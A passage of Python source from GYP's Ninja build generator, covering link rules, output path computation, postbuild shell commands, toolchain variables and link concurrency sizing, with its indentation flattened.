self.ninja.build(build_output, 'lipo', inputs, variables=extra_bindings)
return output
def WriteLinkForArch(self, ninja_file, spec, config_name, config,
link_deps, arch=None):
"""Write out a link step. Fills out target.binary. """
command = {
'executable': 'link',
'loadable_module': 'solink_module',
'shared_library': 'solink',
}[spec['type']]
command_suffix = ''
implicit_deps = set()
solibs = set()
if 'dependencies' in spec:
# Two kinds of dependencies:
# - Linkable dependencies (like a .a or a .so): add them to the link line.
# - Non-linkable dependencies (like a rule that generates a file
# and writes a stamp file): add them to implicit_deps
extra_link_deps = set()
for dep in spec['dependencies']:
target = self.target_outputs.get(dep)
if not target:
continue
linkable = target.Linkable()
if linkable:
new_deps = []
if (self.flavor == 'win' and
target.component_objs and
self.msvs_settings.IsUseLibraryDependencyInputs(config_name)):
new_deps = target.component_objs
elif self.flavor == 'win' and target.import_lib:
new_deps = [target.import_lib]
elif target.UsesToc(self.flavor):
solibs.add(target.binary)
implicit_deps.add(target.binary + '.TOC')
else:
new_deps = [target.binary]
for new_dep in new_deps:
if new_dep not in extra_link_deps:
extra_link_deps.add(new_dep)
link_deps.append(new_dep)
final_output = target.FinalOutput()
if not linkable or final_output != target.binary:
implicit_deps.add(final_output)
extra_bindings = []
if self.uses_cpp and self.flavor != 'win':
extra_bindings.append(('ld', '$ldxx'))
output = self.ComputeOutput(spec, arch)
if arch is None and not self.is_mac_bundle:
self.AppendPostbuildVariable(extra_bindings, spec, output, output)
is_executable = spec['type'] == 'executable'
# The ldflags config key is not used on mac or win. On those platforms
# linker flags are set via xcode_settings and msvs_settings, respectively.
env_ldflags = os.environ.get('LDFLAGS', '').split()
if self.flavor == 'mac':
ldflags = self.xcode_settings.GetLdflags(config_name,
self.ExpandSpecial(generator_default_variables['PRODUCT_DIR']),
self.GypPathToNinja, arch)
ldflags = env_ldflags + ldflags
elif self.flavor == 'win':
manifest_base_name = self.GypPathToUniqueOutput(
self.ComputeOutputFileName(spec))
ldflags, intermediate_manifest, manifest_files = \
self.msvs_settings.GetLdflags(config_name, self.GypPathToNinja,
self.ExpandSpecial, manifest_base_name,
output, is_executable,
self.toplevel_build)
ldflags = env_ldflags + ldflags
self.WriteVariableList(ninja_file, 'manifests', manifest_files)
implicit_deps = implicit_deps.union(manifest_files)
if intermediate_manifest:
self.WriteVariableList(
ninja_file, 'intermediatemanifest', [intermediate_manifest])
command_suffix = _GetWinLinkRuleNameSuffix(
self.msvs_settings.IsEmbedManifest(config_name))
def_file = self.msvs_settings.GetDefFile(self.GypPathToNinja)
if def_file:
implicit_deps.add(def_file)
else:
# Respect environment variables related to build, but target-specific
# flags can still override them.
ldflags = env_ldflags + config.get('ldflags', [])
if is_executable and len(solibs):
rpath = 'lib/'
if self.toolset != 'target':
rpath += self.toolset
ldflags.append(r'-Wl,-rpath=\$$ORIGIN/%s' % rpath)
ldflags.append('-Wl,-rpath-link=%s' % rpath)
self.WriteVariableList(ninja_file, 'ldflags',
map(self.ExpandSpecial, ldflags))
library_dirs = config.get('library_dirs', [])
if self.flavor == 'win':
library_dirs = [self.msvs_settings.ConvertVSMacros(l, config_name)
for l in library_dirs]
library_dirs = ['/LIBPATH:' + QuoteShellArgument(self.GypPathToNinja(l),
self.flavor)
for l in library_dirs]
else:
library_dirs = [QuoteShellArgument('-L' + self.GypPathToNinja(l),
self.flavor)
for l in library_dirs]
libraries = gyp.common.uniquer(map(self.ExpandSpecial,
spec.get('libraries', [])))
if self.flavor == 'mac':
libraries = self.xcode_settings.AdjustLibraries(libraries, config_name)
elif self.flavor == 'win':
libraries = self.msvs_settings.AdjustLibraries(libraries)
self.WriteVariableList(ninja_file, 'libs', library_dirs + libraries)
linked_binary = output
if command in ('solink', 'solink_module'):
extra_bindings.append(('soname', os.path.split(output)[1]))
extra_bindings.append(('lib',
gyp.common.EncodePOSIXShellArgument(output)))
if self.flavor != 'win':
link_file_list = output
if self.is_mac_bundle:
# 'Dependency Framework.framework/Versions/A/Dependency Framework' ->
# 'Dependency Framework.framework.rsp'
link_file_list = self.xcode_settings.GetWrapperName()
if arch:
link_file_list += '.' + arch
link_file_list += '.rsp'
# If an rspfile contains spaces, ninja surrounds the filename with
# quotes around it and then passes it to open(), creating a file with
# quotes in its name (and when looking for the rsp file, the name
# makes it through bash which strips the quotes) :-/
link_file_list = link_file_list.replace(' ', '_')
extra_bindings.append(
('link_file_list',
gyp.common.EncodePOSIXShellArgument(link_file_list)))
if self.flavor == 'win':
extra_bindings.append(('binary', output))
if ('/NOENTRY' not in ldflags and
not self.msvs_settings.GetNoImportLibrary(config_name)):
self.target.import_lib = output + '.lib'
extra_bindings.append(('implibflag',
'/IMPLIB:%s' % self.target.import_lib))
pdbname = self.msvs_settings.GetPDBName(
config_name, self.ExpandSpecial, output + '.pdb')
output = [output, self.target.import_lib]
if pdbname:
output.append(pdbname)
elif not self.is_mac_bundle:
output = [output, output + '.TOC']
else:
command = command + '_notoc'
elif self.flavor == 'win':
extra_bindings.append(('binary', output))
pdbname = self.msvs_settings.GetPDBName(
config_name, self.ExpandSpecial, output + '.pdb')
if pdbname:
output = [output, pdbname]
if len(solibs):
extra_bindings.append(('solibs', gyp.common.EncodePOSIXShellList(solibs)))
ninja_file.build(output, command + command_suffix, link_deps,
implicit=list(implicit_deps),
variables=extra_bindings)
return linked_binary
def WriteTarget(self, spec, config_name, config, link_deps, compile_deps):
extra_link_deps = any(self.target_outputs.get(dep).Linkable()
for dep in spec.get('dependencies', [])
if dep in self.target_outputs)
if spec['type'] == 'none' or (not link_deps and not extra_link_deps):
# TODO(evan): don't call this function for 'none' target types, as
# it doesn't do anything, and we fake out a 'binary' with a stamp file.
self.target.binary = compile_deps
self.target.type = 'none'
elif spec['type'] == 'static_library':
self.target.binary = self.ComputeOutput(spec)
if (self.flavor not in ('mac', 'openbsd', 'win') and not
self.is_standalone_static_library):
self.ninja.build(self.target.binary, 'alink_thin', link_deps,
order_only=compile_deps)
else:
variables = []
if self.xcode_settings:
libtool_flags = self.xcode_settings.GetLibtoolflags(config_name)
if libtool_flags:
variables.append(('libtool_flags', libtool_flags))
if self.msvs_settings:
libflags = self.msvs_settings.GetLibFlags(config_name,
self.GypPathToNinja)
variables.append(('libflags', libflags))
if self.flavor != 'mac' or len(self.archs) == 1:
self.AppendPostbuildVariable(variables, spec,
self.target.binary, self.target.binary)
self.ninja.build(self.target.binary, 'alink', link_deps,
order_only=compile_deps, variables=variables)
else:
inputs = []
for arch in self.archs:
output = self.ComputeOutput(spec, arch)
self.arch_subninjas[arch].build(output, 'alink', link_deps[arch],
order_only=compile_deps,
variables=variables)
inputs.append(output)
# TODO: It's not clear if libtool_flags should be passed to the alink
# call that combines single-arch .a files into a fat .a file.
self.AppendPostbuildVariable(variables, spec,
self.target.binary, self.target.binary)
self.ninja.build(self.target.binary, 'alink', inputs,
# FIXME: test proving order_only=compile_deps isn't
# needed.
variables=variables)
else:
self.target.binary = self.WriteLink(spec, config_name, config, link_deps)
return self.target.binary
def WriteMacBundle(self, spec, mac_bundle_depends, is_empty):
assert self.is_mac_bundle
package_framework = spec['type'] in ('shared_library', 'loadable_module')
output = self.ComputeMacBundleOutput()
if is_empty:
output += '.stamp'
variables = []
self.AppendPostbuildVariable(variables, spec, output, self.target.binary,
is_command_start=not package_framework)
if package_framework and not is_empty:
variables.append(('version', self.xcode_settings.GetFrameworkVersion()))
self.ninja.build(output, 'package_framework', mac_bundle_depends,
variables=variables)
else:
self.ninja.build(output, 'stamp', mac_bundle_depends,
variables=variables)
self.target.bundle = output
return output
def GetToolchainEnv(self, additional_settings=None):
"""Returns the variables toolchain would set for build steps."""
env = self.GetSortedXcodeEnv(additional_settings=additional_settings)
if self.flavor == 'win':
env = self.GetMsvsToolchainEnv(
additional_settings=additional_settings)
return env
def GetMsvsToolchainEnv(self, additional_settings=None):
"""Returns the variables Visual Studio would set for build steps."""
return self.msvs_settings.GetVSMacroEnv('$!PRODUCT_DIR',
config=self.config_name)
def GetSortedXcodeEnv(self, additional_settings=None):
"""Returns the variables Xcode would set for build steps."""
assert self.abs_build_dir
abs_build_dir = self.abs_build_dir
return gyp.xcode_emulation.GetSortedXcodeEnv(
self.xcode_settings, abs_build_dir,
os.path.join(abs_build_dir, self.build_to_base), self.config_name,
additional_settings)
def GetSortedXcodePostbuildEnv(self):
"""Returns the variables Xcode would set for postbuild steps."""
postbuild_settings = {}
# CHROMIUM_STRIP_SAVE_FILE is a chromium-specific hack.
# TODO(thakis): It would be nice to have some general mechanism instead.
strip_save_file = self.xcode_settings.GetPerTargetSetting(
'CHROMIUM_STRIP_SAVE_FILE')
if strip_save_file:
postbuild_settings['CHROMIUM_STRIP_SAVE_FILE'] = strip_save_file
return self.GetSortedXcodeEnv(additional_settings=postbuild_settings)
def AppendPostbuildVariable(self, variables, spec, output, binary,
is_command_start=False):
"""Adds a 'postbuild' variable if there is a postbuild for |output|."""
postbuild = self.GetPostbuildCommand(spec, output, binary, is_command_start)
if postbuild:
variables.append(('postbuilds', postbuild))
def GetPostbuildCommand(self, spec, output, output_binary, is_command_start):
"""Returns a shell command that runs all the postbuilds, and removes
|output| if any of them fails. If |is_command_start| is False, then the
returned string will start with ' && '."""
if not self.xcode_settings or spec['type'] == 'none' or not output:
return ''
output = QuoteShellArgument(output, self.flavor)
postbuilds = gyp.xcode_emulation.GetSpecPostbuildCommands(spec, quiet=True)
if output_binary is not None:
postbuilds = self.xcode_settings.AddImplicitPostbuilds(
self.config_name,
os.path.normpath(os.path.join(self.base_to_build, output)),
QuoteShellArgument(
os.path.normpath(os.path.join(self.base_to_build, output_binary)),
self.flavor),
postbuilds, quiet=True)
if not postbuilds:
return ''
# Postbuilds expect to be run in the gyp file's directory, so insert an
# implicit postbuild to cd to there.
postbuilds.insert(0, gyp.common.EncodePOSIXShellList(
['cd', self.build_to_base]))
env = self.ComputeExportEnvString(self.GetSortedXcodePostbuildEnv())
# G will be non-null if any postbuild fails. Run all postbuilds in a
# subshell.
commands = env + ' (' + \
' && '.join([ninja_syntax.escape(command) for command in postbuilds])
command_string = (commands + '); G=$$?; '
# Remove the final output if any postbuild failed.
'((exit $$G) || rm -rf %s) ' % output + '&& exit $$G)')
if is_command_start:
return '(' + command_string + ' && '
else:
return '$ && (' + command_string
def ComputeExportEnvString(self, env):
"""Given an environment, returns a string looking like
'export FOO=foo; export BAR="${FOO} bar;'
that exports |env| to the shell."""
export_str = []
for k, v in env:
export_str.append('export %s=%s;' %
(k, ninja_syntax.escape(gyp.common.EncodePOSIXShellArgument(v))))
return ' '.join(export_str)
def ComputeMacBundleOutput(self):
"""Return the 'output' (full output path) to a bundle output directory."""
assert self.is_mac_bundle
path = generator_default_variables['PRODUCT_DIR']
return self.ExpandSpecial(
os.path.join(path, self.xcode_settings.GetWrapperName()))
def ComputeOutputFileName(self, spec, type=None):
"""Compute the filename of the final output for the current target."""
if not type:
type = spec['type']
default_variables = copy.copy(generator_default_variables)
CalculateVariables(default_variables, {'flavor': self.flavor})
# Compute filename prefix: the product prefix, or a default for
# the product type.
DEFAULT_PREFIX = {
'loadable_module': default_variables['SHARED_LIB_PREFIX'],
'shared_library': default_variables['SHARED_LIB_PREFIX'],
'static_library': default_variables['STATIC_LIB_PREFIX'],
'executable': default_variables['EXECUTABLE_PREFIX'],
}
prefix = spec.get('product_prefix', DEFAULT_PREFIX.get(type, ''))
# Compute filename extension: the product extension, or a default
# for the product type.
DEFAULT_EXTENSION = {
'loadable_module': default_variables['SHARED_LIB_SUFFIX'],
'shared_library': default_variables['SHARED_LIB_SUFFIX'],
'static_library': default_variables['STATIC_LIB_SUFFIX'],
'executable': default_variables['EXECUTABLE_SUFFIX'],
}
extension = spec.get('product_extension')
if extension:
extension = '.' + extension
else:
extension = DEFAULT_EXTENSION.get(type, '')
if 'product_name' in spec:
# If we were given an explicit name, use that.
target = spec['product_name']
else:
# Otherwise, derive a name from the target name.
target = spec['target_name']
if prefix == 'lib':
# Snip out an extra 'lib' from libs if appropriate.
target = StripPrefix(target, 'lib')
if type in ('static_library', 'loadable_module', 'shared_library',
'executable'):
return '%s%s%s' % (prefix, target, extension)
elif type == 'none':
return '%s.stamp' % target
else:
raise Exception('Unhandled output type %s' % type)
def ComputeOutput(self, spec, arch=None):
"""Compute the path for the final output of the spec."""
type = spec['type']
if self.flavor == 'win':
override = self.msvs_settings.GetOutputName(self.config_name,
self.ExpandSpecial)
if override:
return override
if arch is None and self.flavor == 'mac' and type in (
'static_library', 'executable', 'shared_library', 'loadable_module'):
filename = self.xcode_settings.GetExecutablePath()
else:
filename = self.ComputeOutputFileName(spec, type)
if arch is None and 'product_dir' in spec:
path = os.path.join(spec['product_dir'], filename)
return self.ExpandSpecial(path)
# Some products go into the output root, libraries go into shared library
# dir, and everything else goes into the normal place.
type_in_output_root = ['executable', 'loadable_module']
if self.flavor == 'mac' and self.toolset == 'target':
type_in_output_root += ['shared_library', 'static_library']
elif self.flavor == 'win' and self.toolset == 'target':
type_in_output_root += ['shared_library']
if arch is not None:
# Make sure partial executables don't end up in a bundle or the regular
# output directory.
archdir = 'arch'
if self.toolset != 'target':
archdir = os.path.join('arch', '%s' % self.toolset)
return os.path.join(archdir, AddArch(filename, arch))
elif type in type_in_output_root or self.is_standalone_static_library:
return filename
elif type == 'shared_library':
libdir = 'lib'
if self.toolset != 'target':
libdir = os.path.join('lib', '%s' % self.toolset)
return os.path.join(libdir, filename)
else:
return self.GypPathToUniqueOutput(filename, qualified=False)
def WriteVariableList(self, ninja_file, var, values):
assert not isinstance(values, str)
if values is None:
values = []
ninja_file.variable(var, ' '.join(values))
def WriteNewNinjaRule(self, name, args, description, is_cygwin, env, pool,
depfile=None):
"""Write out a new ninja "rule" statement for a given command.
Returns the name of the new rule, and a copy of |args| with variables
expanded."""
if self.flavor == 'win':
args = [self.msvs_settings.ConvertVSMacros(
arg, self.base_to_build, config=self.config_name)
for arg in args]
description = self.msvs_settings.ConvertVSMacros(
description, config=self.config_name)
elif self.flavor == 'mac':
# |env| is an empty list on non-mac.
args = [gyp.xcode_emulation.ExpandEnvVars(arg, env) for arg in args]
description = gyp.xcode_emulation.ExpandEnvVars(description, env)
# TODO: we shouldn't need to qualify names; we do it because
# currently the ninja rule namespace is global, but it really
# should be scoped to the subninja.
rule_name = self.name
if self.toolset == 'target':
rule_name += '.' + self.toolset
rule_name += '.' + name
rule_name = re.sub('[^a-zA-Z0-9_]', '_', rule_name)
# Remove variable references, but not if they refer to the magic rule
# variables. This is not quite right, as it also protects these for
# actions, not just for rules where they are valid. Good enough.
protect = [ '${root}', '${dirname}', '${source}', '${ext}', '${name}' ]
protect = '(?!' + '|'.join(map(re.escape, protect)) + ')'
description = re.sub(protect + r'\$', '_', description)
# gyp dictates that commands are run from the base directory.
# cd into the directory before running, and adjust paths in
# the arguments to point to the proper locations.
rspfile = None
rspfile_content = None
args = [self.ExpandSpecial(arg, self.base_to_build) for arg in args]
if self.flavor == 'win':
rspfile = rule_name + '.$unique_name.rsp'
# The cygwin case handles this inside the bash sub-shell.
run_in = '' if is_cygwin else ' ' + self.build_to_base
if is_cygwin:
rspfile_content = self.msvs_settings.BuildCygwinBashCommandLine(
args, self.build_to_base)
else:
rspfile_content = gyp.msvs_emulation.EncodeRspFileList(args)
command = ('%s gyp-win-tool action-wrapper $arch ' % sys.executable +
rspfile + run_in)
else:
env = self.ComputeExportEnvString(env)
command = gyp.common.EncodePOSIXShellList(args)
command = 'cd %s; ' % self.build_to_base + env + command
# GYP rules/actions express being no-ops by not touching their outputs.
# Avoid executing downstream dependencies in this case by specifying
# restat=1 to ninja.
self.ninja.rule(rule_name, command, description, depfile=depfile,
restat=True, pool=pool,
rspfile=rspfile, rspfile_content=rspfile_content)
self.ninja.newline()
return rule_name, args
def CalculateVariables(default_variables, params):
"""Calculate additional variables for use in the build (called by gyp)."""
global generator_additional_non_configuration_keys
global generator_additional_path_sections
flavor = gyp.common.GetFlavor(params)
if flavor == 'mac':
default_variables.setdefault('OS', 'mac')
default_variables.setdefault('SHARED_LIB_SUFFIX', '.dylib')
default_variables.setdefault('SHARED_LIB_DIR',
generator_default_variables['PRODUCT_DIR'])
default_variables.setdefault('LIB_DIR',
generator_default_variables['PRODUCT_DIR'])
# Copy additional generator configuration data from Xcode, which is shared
# by the Mac Ninja generator.
import gyp.generator.xcode as xcode_generator
generator_additional_non_configuration_keys = getattr(xcode_generator,
'generator_additional_non_configuration_keys', [])
generator_additional_path_sections = getattr(xcode_generator,
'generator_additional_path_sections', [])
global generator_extra_sources_for_rules
generator_extra_sources_for_rules = getattr(xcode_generator,
'generator_extra_sources_for_rules', [])
elif flavor == 'win':
exts = gyp.MSVSUtil.TARGET_TYPE_EXT
default_variables.setdefault('OS', 'win')
default_variables['EXECUTABLE_SUFFIX'] = '.' + exts['executable']
default_variables['STATIC_LIB_PREFIX'] = ''
default_variables['STATIC_LIB_SUFFIX'] = '.' + exts['static_library']
default_variables['SHARED_LIB_PREFIX'] = ''
default_variables['SHARED_LIB_SUFFIX'] = '.' + exts['shared_library']
# Copy additional generator configuration data from VS, which is shared
# by the Windows Ninja generator.
import gyp.generator.msvs as msvs_generator
generator_additional_non_configuration_keys = getattr(msvs_generator,
'generator_additional_non_configuration_keys', [])
generator_additional_path_sections = getattr(msvs_generator,
'generator_additional_path_sections', [])
gyp.msvs_emulation.CalculateCommonVariables(default_variables, params)
else:
operating_system = flavor
if flavor == 'android':
operating_system = 'linux' # Keep this legacy behavior for now.
default_variables.setdefault('OS', operating_system)
default_variables.setdefault('SHARED_LIB_SUFFIX', '.so')
default_variables.setdefault('SHARED_LIB_DIR',
os.path.join('$!PRODUCT_DIR', 'lib'))
default_variables.setdefault('LIB_DIR',
os.path.join('$!PRODUCT_DIR', 'obj'))
def ComputeOutputDir(params):
"""Returns the path from the toplevel_dir to the build output directory."""
# generator_dir: relative path from pwd to where make puts build files.
# Makes migrating from make to ninja easier, ninja doesn't put anything here.
generator_dir = os.path.relpath(params['options'].generator_output or '.')
# output_dir: relative path from generator_dir to the build directory.
output_dir = params.get('generator_flags', {}).get('output_dir', 'out')
# Relative path from source root to our output files. e.g. "out"
return os.path.normpath(os.path.join(generator_dir, output_dir))
def CalculateGeneratorInputInfo(params):
"""Called by __init__ to initialize generator values based on params."""
# E.g. "out/gypfiles"
toplevel = params['options'].toplevel_dir
qualified_out_dir = os.path.normpath(os.path.join(
toplevel, ComputeOutputDir(params), 'gypfiles'))
global generator_filelist_paths
generator_filelist_paths = {
'toplevel': toplevel,
'qualified_out_dir': qualified_out_dir,
}
def OpenOutput(path, mode='w'):
"""Open |path| for writing, creating directories if necessary."""
gyp.common.EnsureDirExists(path)
return open(path, mode)
def CommandWithWrapper(cmd, wrappers, prog):
wrapper = wrappers.get(cmd, '')
if wrapper:
return wrapper + ' ' + prog
return prog
def GetDefaultConcurrentLinks():
"""Returns a best-guess for a number of concurrent links."""
pool_size = int(os.environ.get('GYP_LINK_CONCURRENCY', 0))
if pool_size:
return pool_size
if sys.platform in ('win32', 'cygwin'):
import ctypes
class MEMORYSTATUSEX(ctypes.Structure):
_fields_ = [
("dwLength", ctypes.c_ulong),
("dwMemoryLoad", ctypes.c_ulong),
("ullTotalPhys", ctypes.c_ulonglong),
("ullAvailPhys", ctypes.c_ulonglong),
("ullTotalPageFile", ctypes.c_ulonglong),
("ullAvailPageFile", ctypes.c_ulonglong),
("ullTotalVirtual", ctypes.c_ulonglong),
("ullAvailVirtual", ctypes.c_ulonglong),
("sullAvailExtendedVirtual", ctypes.c_ulonglong),
]
stat = MEMORYSTATUSEX()
stat.dwLength = ctypes.sizeof(stat)
ctypes.windll.kernel32.GlobalMemoryStatusEx(ctypes.byref(stat))
# VS 2015 uses 20% more working set than VS 2013 and can consume all RAM
# on a 64 GB machine.
mem_limit = max(1, stat.ullTotalPhys / (5 * (2 ** 30))) # total / 5GB
hard_cap = max(1, int(os.environ.get('GYP_LINK_CONCURRENCY_MAX', 2**32)))
return min(mem_limit, hard_cap)
elif sys.platform.startswith('linux'):
if os.path.exists("/proc/meminfo"):
with open("/proc/meminfo") as meminfo:
memtotal_re = re.compile(r'^MemTotal:\s*(\d*)\s*kB')
for line in meminfo:
match = memtotal_re.match(line)
if not match:
continue
# Allow 8Gb per link on Linux because Gold is quite memory hungry
return max(1, int(match.group(1)) / (8 * (2 ** 20)))
return 1
elif sys.platform == 'darwin':
try:
avail_bytes = int(subprocess.check_output(['sysctl', '-n', 'hw.memsize']))
# A static library debug build of Chromium's unit_tests takes ~2.7GB, so
# 4GB per ld process allows for some more bloat.
return max(1, avail_bytes / (4 * (2 ** 30))) # total / 4GB
except:
return 1
else:
# TODO(scottmg): Implement this for other platforms.
return 1
def _GetWinLinkRuleNameSuffix(embed_manifest):
"""Returns the suffix used to select an appropriate linking rule depending on
whether the manifest embedding is enabled."""
return '_embed' if embed_manifest else ''
def _AddWinLinkRules(master_ninja, embed_manifest):
"""Adds link rules for Windows platform to |master_ninja|."""
def FullLinkCommand(ldcmd, out, binary_type):
resource_name = {
'exe': '1',
'dll': '2',
}[binary_type]
return '%(python)s gyp-win-tool link-with-manifests $arch %(embed)s ' \
'%(out)s "%(ldcmd)s" %(resname)s $mt $rc "$intermediatemanifest" ' \
'$manifests' % {
'python': sys.executable,
'out': out,
'ldcmd': ldcmd,
'resname': resource_name,
'embed': embed_manifest }
rule_name_suffix = _GetWinLinkRuleNameSuffix(embed_manifest)
use_separate_mspdbsrv = (
int(os.environ.get('GYP_USE_SEPARATE_MSPDBSRV', '0')) != 0)
dlldesc = 'LINK%s(DLL) $binary' % rule_name_suffix.upper()
dllcmd = ('%s gyp-win-tool link-wrapper $arch %s '
'$ld /nologo $implibflag /DLL /OUT:$binary '
'@$binary.rsp' % (sys.executable, use_separate_mspdbsrv))
dllcmd = FullLinkCommand(dllcmd, '$binary', 'dll')
master_ninja.rule('solink' + rule_name_suffix,
description=dlldesc, command=dllcmd,
rspfile='$binary.rsp',
rspfile_content='$libs $in_newline $ldflags',
restat=True,
pool='link_pool')
master_ninja.rule('solink_module' + rule_name_suffix,
description=dlldesc, command=dllcmd,
rspfile='$binary.rsp',
rspfile_content='$libs $in_newline $ldflags',
restat=True,
pool='link_pool')
# Note that ldflags goes at the end so that it has the option of
# overriding default settings earlier in the command line.
exe_cmd = ('%s gyp-win-tool link-wrapper $arch %s '
'$ld /nologo /OUT:$binary @$binary.rsp' %
(sys.executable, use_separate_mspdbsrv))
exe_cmd = FullLinkCommand(exe_cmd, '$binary', 'exe')
master_ninja.rule('link' + rule_name_suffix,
description='LINK%s $binary' % rule_name_suffix.upper(),
command=exe_cmd,
rspfile='$binary.rsp',
rspfile_content='$in_newline $libs $ldflags',
pool='link_pool')
def GenerateOutputForConfig(target_list, target_dicts, data, params,
config_name):
options = params['options']
flavor = gyp.common.GetFlavor(params)
generator_flags = params.get('generator_flags', {})
# build_dir: relative path from source root to our output files.
# e.g. "out/Debug"
build_dir = os.path.normpath(
os.path.join(ComputeOutputDir(params), config_name))
toplevel_build = os.path.join(options.toplevel_dir, build_dir)
master_ninja_file = OpenOutput(os.path.join(toplevel_build, 'build.ninja'))
master_ninja = ninja_syntax.Writer(master_ninja_file, width=120)
# Put build-time support tools in out/{config_name}.
gyp.common.CopyTool(flavor, toplevel_build)
# Grab make settings for CC/CXX.
# The rules are
# - The priority from low to high is gcc/g++, the 'make_global_settings' in
# gyp, the environment variable.
# - If there is no 'make_global_settings' for CC.host/CXX.host or
# 'CC_host'/'CXX_host' enviroment variable, cc_host/cxx_host should be set
# to cc/cxx.
if flavor == 'win':
ar = 'lib.exe'
# cc and cxx must be set to the correct architecture by overriding with one
# of cl_x86 or cl_x64 below.
cc = 'UNSET'
cxx = 'UNSET'
ld = 'link.exe'
ld_host = '$ld'
else:
ar = 'ar'
cc = 'cc'
cxx = 'c++'
ld = '$cc'
ldxx = '$cxx'
ld_host = '$cc_host'
ldxx_host = '$cxx_host'
ar_host = 'ar'
cc_host = None
cxx_host = None
cc_host_global_setting = None
cxx_host_global_setting = None
clang_cl = None
nm = 'nm'
nm_host = 'nm'
readelf = 'readelf'
readelf_host = 'readelf'
build_file, _, _ = gyp.common.ParseQualifiedTarget(target_list[0])
make_global_settings = data[build_file].get('make_global_settings', [])
build_to_root = gyp.common.InvertRelativePath(build_dir,
options.toplevel_dir)
wrappers = {}
for key, value in make_global_settings:
if key == 'AR':
ar = os.path.join(build_to_root, value)
if key == 'AR.host':
ar_host = os.path.join(build_to_root, value)
if key == 'CC':
cc = os.path.join(build_to_root, value)
if cc.endswith('clang-cl'):
clang_cl = cc
if key == 'CXX':
cxx = os.path.join(build_to_root, value)
if key == 'CC.host':
cc_host = os.path.join(build_to_root, value)
cc_host_global_setting = value
if key == 'CXX.host':
cxx_host = os.path.join(build_to_root, value)
cxx_host_global_setting = value
if key == 'LD':
ld = os.path.join(build_to_root, value)
if key == 'LD.host':
ld_host = os.path.join(build_to_root, value)
if key == 'NM':
nm = os.path.join(build_to_root, value)
if key == 'NM.host':
nm_host = os.path.join(build_to_root, value)
if key == 'READELF':
readelf = os.path.join(build_to_root, value)
if key == 'READELF.host':
readelf_host = os.path.join(build_to_root, value)
if key.endswith('_wrapper'):
wrappers[key[:-len('_wrapper')]] = os.path.join(build_to_root, value)
# Support wrappers from environment variables too.
for key, value in os.environ.iteritems():
if key.lower().endswith('_wrapper'):
key_prefix = key[:-len('_wrapper')]
key_prefix = re.sub(r'\.HOST$', '.host', key_prefix)
wrappers[key_prefix] = os.path.join(build_to_root, value)
if flavor == 'win':
configs = [target_dicts[qualified_target]['configurations'][config_name]
for qualified_target in target_list]
shared_system_includes = None
if not generator_flags.get('ninja_use_custom_environment_files', 0):
shared_system_includes = \
gyp.msvs_emulation.ExtractSharedMSVSSystemIncludes(
configs, generator_flags)
cl_paths = gyp.msvs_emulation.GenerateEnvironmentFiles(
toplevel_build, generator_flags, shared_system_includes, OpenOutput)
for arch, path in cl_paths.iteritems():
if clang_cl:
# If we have selected clang-cl, use that instead.
path = clang_cl
command = CommandWithWrapper('CC', wrappers,
QuoteShellArgument(path, 'win'))
if clang_cl:
# Use clang-cl to cross-compile for x86 or x86_64.
command += (' -m32' if arch == 'x86' else ' -m64')
master_ninja.variable('cl_' + arch, command)
cc = GetEnvironFallback(['CC_target', 'CC'], cc)
master_ninja.variable('cc', CommandWithWrapper('CC', wrappers, cc))
cxx = GetEnvironFallback(['CXX_target', 'CXX'], cxx)
master_ninja.variable('cxx', CommandWithWrapper('CXX', wrappers, cxx))
if flavor == 'win':
master_ninja.variable('ld', ld)
master_ninja.variable('idl', 'midl.exe')
master_ninja.variable('ar', ar)
master_ninja.variable('rc', 'rc.exe')
master_ninja.variable('ml_x86', 'ml.exe')
master_ninja.variable('ml_x64', 'ml64.exe')
master_ninja.variable('mt', 'mt.exe')
else:
master_ninja.variable('ld', CommandWithWrapper('LINK', wrappers, ld))
master_ninja.variable('ldxx', CommandWithWrapper('LINK', wrappers, ldxx))
master_ninja.variable('ar', GetEnvironFallback(['AR_target', 'AR'], ar))
if flavor != 'mac':
# Mac does not use readelf/nm for .TOC generation, so avoiding polluting
# the master ninja with extra unused variables.
master_ninja.variable(
'nm', GetEnvironFallback(['NM_target', 'NM'], nm))
master_ninja.variable(
'readelf', GetEnvironFallback(['READELF_target', 'READELF'], readelf))
if generator_supports_multiple_toolsets:
if not cc_host:
cc_host = cc
if not cxx_host:
cxx_host = cxx
master_ninja.variable('ar_host', GetEnvironFallback(['AR_host'], ar_host))
master_ninja.variable('nm_host', GetEnvironFallback(['NM_host'], nm_host))
master_ninja.variable('readelf_host',
GetEnvironFallback(['READELF_host'], readelf_host))
cc_host = GetEnvironFallback(['CC_host'], cc_host)
cxx_host = GetEnvironFallback(['CXX_host'], cxx_host)
# The environment variable could be used in 'make_global_settings', like
# ['CC.host', '$(CC)'] or ['CXX.host', '$(CXX)'], transform them here.
if '$(CC)' in cc_host and cc_host_global_setting:
cc_host = cc_host_global_setting.replace('$(CC)', cc)
if '$(CXX)' in cxx_host and cxx_host_global_setting:
cxx_host = cxx_host_global_setting.replace('$(CXX)', cxx)
master_ninja.variable('cc_host',
CommandWithWrapper('CC.host', wrappers, cc_host))
master_ninja.variable('cxx_host',
CommandWithWrapper('CXX.host', wrappers, cxx_host))
if flavor == 'win':
master_ninja.variable('ld_host', ld_host)
else:
master_ninja.variable('ld_host', CommandWithWrapper(
'LINK', wrappers, ld_host))
master_ninja.variable('ldxx_host', CommandWithWrapper(
'LINK', wrappers, ldxx_host))
master_ninja.newline()
master_ninja.pool('link_pool', depth=GetDefaultConcurrentLinks())
master_ninja.newline()
deps = 'msvc' if flavor == 'win' else 'gcc'
if flavor != 'win':
master_ninja.rule(
'cc',
description='CC $out',
command=('$cc -MMD -MF $out.d $defines $includes $cflags $cflags_c '
'$cflags_pch_c -c $in -o $out'),
depfile='$out.d',
deps=deps)
master_ninja.rule(
'cc_s',
description='CC $out',
command=('$cc $defines $includes $cflags $cflags_c '
'$cflags_pch_c -c $in -o $out'))
master_ninja.rule(
'cxx',
description='CXX $out',
command=('$cxx -MMD -MF $out.d $defines $includes $cflags $cflags_cc '
'$cflags_pch_cc -c $in -o $out'),
depfile='$out.d',
deps=deps)
else:
# TODO(scottmg) Separate pdb names is a test to see if it works around
# http://crbug.com/142362. It seems there's a race between the creation of
# the .pdb by the precompiled header step for .cc and the compilation of
# .c files. This should be handled by mspdbsrv, but rarely errors out with
# c1xx : fatal error C1033: cannot open program database
# By making the rules target separate pdb files this might be avoided.
cc_command = ('ninja -t msvc -e $arch ' +
'-- '
'$cc /nologo /showIncludes /FC '
'@$out.rsp /c $in /Fo$out /Fd$pdbname_c ')
